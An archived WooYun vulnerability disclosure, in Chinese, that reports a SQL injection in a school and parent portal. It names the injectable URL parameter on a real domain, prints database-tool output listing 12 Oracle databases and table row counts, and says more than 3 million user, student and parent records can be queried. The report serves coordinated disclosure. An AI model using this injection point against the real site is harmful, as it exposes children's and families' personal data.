乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-12: 细节已通知厂商并且等待厂商处理中 2016-04-12: 厂商已经确认,细节仅向厂商公开 2016-04-22: 细节向核心白帽子及相关领域专家公开 2016-05-02: 细节向普通白帽子公开 2016-05-12: 细节向实习白帽子公开 2016-05-27: 细节向公众公开
RT
注入点:http://www.ntjxt.com/areas?area_id=1
数据库
available databases [12]:[*] COMMUNITY_ONLINE[*] CTXSYS[*] ESCHOOL30[*] EXFSYS[*] GATEWAY[*] MDSYS[*] OLAPSYS[*] PARENTSCHOOL[*] SYS[*] SYSTEM[*] WMSYS[*] XUEXI6_PARENTSCHOOL
表
Database: PARENTSCHOOL+-----------------------+---------+| Table | Entries |+-----------------------+---------+| SESSIONS | 11057339 || PAGE_RECORDS | 8907483 || ACTIVITY_MESSAGES | 1530992 || BLESSINGS | 962585 || BOOK_MESSAGES | 545177 || BOOK_ACTIVITIES | 333791 || LOTTERY_RECORDS | 89213 || ACTION_RECORDS | 85368 || FOCUS | 69882 || NEWS_LINES | 20725 || BOOK_EXCHANGES | 8830 || BOTTLE_USER_RELATIONS | 8596 || LINSHI | 8286 || PAPER_RESULTS | 5733 || AWARD_USER_RELATIONS | 5581 || BOTTLES | 4705 || BOOK_ACTIVITY_AWARDS | 3785 || QUEUE_MESSAGES | 1083 || QUESTIONS | 1060 || BOOK_AWARD_USERS | 887 || RESOURCES | 655 || SCHOOL_TYPES | 574 || SCHOOLS | 512 || AREA_NEWS | 493 || ARTICLES | 459 || BOOK_ARTICLES | 434 || BOOK_SETTINGS | 168 || LECTURE_COMMENTS | 134 || ARTICLE_COMMENTS | 113 || INDEX_SETTINGS | 86 || ACTIVITY_PICTURES | 74 || DANGERS | 68 || LOTTERY_SETTINGS | 61 || LECTURES | 52 || ACTIVITY_AWARDS | 36 || RESOURCE_TYPES | 27 || BEAUTIES | 23 || NEWS_TYPES | 23 || BOOK_LISTINGS | 16 || PAPER_OPTIONS | 10 || AREA_MANAGERS | 9 || SONGS | 8 || WAITING_MESSAGE_LOGS | 6 || PAPER_QUESTIONS | 3 || NOTICES | 2 || ACTIVITY_REPORTS | 1 || PAPERS | 1 |+-----------------------+---------+
可垮裤查询数据库 300多w用户信息
Database: ESCHOOL30+-------------------------+---------+| Table | Entries |+-------------------------+---------+| GROUP_USER_RELATIONS | 3276581 || USERS | 3252938 || STUDENTS | 1577602 || PARENTS | 1565084 || SEND_SERVICE_RELATIONS | 333491 || TEACHERS | 89003 || WAITING_MESSAGES | 86689 || USER_GROUPS | 83326 || WAITING_MESSAGE_RECORDS | 7674 || SCHOOL_INFOS | 934 |+-------------------------+---------+
过滤
危害等级:高
漏洞Rank:20
确认时间:2016-04-12 19:05
部分信息由于2011年就不维护了,确实有漏洞
暂无